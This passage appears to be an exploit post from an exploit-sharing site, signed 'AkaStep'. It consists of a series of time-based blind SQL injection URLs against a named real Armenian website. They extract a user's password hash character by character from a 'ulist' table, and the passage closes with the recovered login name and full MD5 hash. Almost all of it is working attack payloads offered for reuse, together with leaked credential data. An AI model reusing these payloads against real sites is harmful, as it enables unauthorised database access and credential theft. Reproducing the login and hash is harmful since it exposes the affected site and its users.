http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

15-ci simvol:   c

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

16-ci simvol:    9


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

17-ci simvol:  0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

18--ci simvol:   0


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

19-cu simvol:   9

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD  5='5




================================================

20-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

21-ci simvol:   e


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

22-c simvol:   3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================


23-cu simvol:    6

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='6',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

24-cu simvol:  e

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

25-ci simvol:   f


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

26-ci simvol:   0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

27-ci simvol:   0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

28-ci simvol:  7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

29-cu simvol:   2


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

30-cu simvol:   8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

31-ci simvol:   3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

32-ci simvol:   f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
Qirilmadi hash:( Blya beddiydie basdan ayaga:*(

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


===========================================================

Enjoy)


/AkaStep



#  0day.today [2018-01-01]  #